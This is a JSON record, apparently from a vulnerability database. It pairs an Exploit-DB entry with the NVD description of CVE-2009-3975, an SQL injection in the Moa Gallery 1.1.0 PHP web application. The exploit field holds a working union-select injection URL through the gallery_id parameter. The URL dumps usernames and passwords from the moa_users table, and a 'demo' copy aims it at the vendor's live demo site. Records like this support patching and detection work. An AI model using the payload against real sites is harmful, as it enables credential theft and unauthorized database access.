{"id": "EDB-ID:9481", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Moa Gallery 1.1.0 gallery_id Remote SQL Injection Vulnerability", "description": "Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability. CVE-2009-3975. Webapps exploit for php platform", "published": "2009-08-24T00:00:00", "modified": "2009-08-24T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9481/", "reporter": "Mr.tro0oqy", "references": [], "cvelist": ["CVE-2009-3975"], "lastseen": "2016-02-01T10:40:50", "viewCount": 7, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-02-01T10:40:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3975"]}], "modified": "2016-02-01T10:40:50", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/9481/", "sourceData": "======================================================================\n[\u00c2\u00bb] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln\n\n[\u00c2\u00bb] Language : php \n\n[\u00c2\u00bb] Download : http://sourceforge.net/projects/moagallery/\n\n[\u00c2\u00bb] Script site : http://www.moagallery.net/\n\n[\u00c2\u00bb] Founder: Mr.tro0oqy <- from Yemen\n\n[\u00c2\u00bb] Gr44tz to: [H]-> borken heart :(\n\n[\u00c2\u00bb] E-mail : t.4@windowslive.com\n======================================================================\nexploit:\n--------\n\nhttp://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--\n\n--------\ndemo:\n--------\n\nhttp://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--\n\n# milw0rm.com [2009-08-24]\n", "osvdbidlist": ["57344"]}

{"cve": [{"lastseen": "2020-10-03T11:54:19", "description": "SQL injection vulnerability in index.php in Moa Gallery 1.1.0 and 1.2.0 allows remote attackers to execute arbitrary SQL commands via the gallery_id parameter in a gallery_view action.", "edition": 3, "cvss3": {}, "published": "2009-11-18T23:30:00", "title": "CVE-2009-3975", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3975"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:moagallery:moa:1.2.0", "cpe:/a:moagallery:moa:1.1.0"], "id": "CVE-2009-3975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3975", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moagallery:moa:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moagallery:moa:1.1.0:*:*:*:*:*:*:*"]}]}